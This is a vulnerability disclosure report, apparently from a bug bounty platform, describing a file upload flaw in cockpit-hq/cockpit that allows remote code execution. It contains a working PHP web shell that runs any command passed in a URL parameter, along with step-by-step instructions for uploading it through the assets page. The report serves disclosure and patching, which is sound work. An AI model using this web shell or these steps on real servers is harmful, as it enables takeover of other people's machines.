File Upload Bypass Leads to Remote Code Execution (RCE) in cockpit-hq/cockpit
Valid
Reported on
Mar 9th 2023
Description
There is no extension checks during file upload. Attacker may upload file to execute malicious code in the server.
Proof of Concept
Step 1: Create a file with the content below and save it as evil.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Step 2: Login to the Cockpit web server
Step 3: Go to assets
Step 4: Upload Assets
Step 5: Upload the file that created.
Step 6: Copy asset link and paste it at a new tab.
Step 7: Able to execute any commands.
Impact
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
I am able to gain access to the whole compromised machine.
Occurrences
We are processing your report and will contact the
cockpit-hq/cockpit
team within 24 hours.
2 months ago
We have contacted a member of the
cockpit-hq/cockpit
team and are waiting to hear back
2 months ago
The researcher's credibility has increased: +7
Assets.php#L129-L180
has been validated
to join this conversation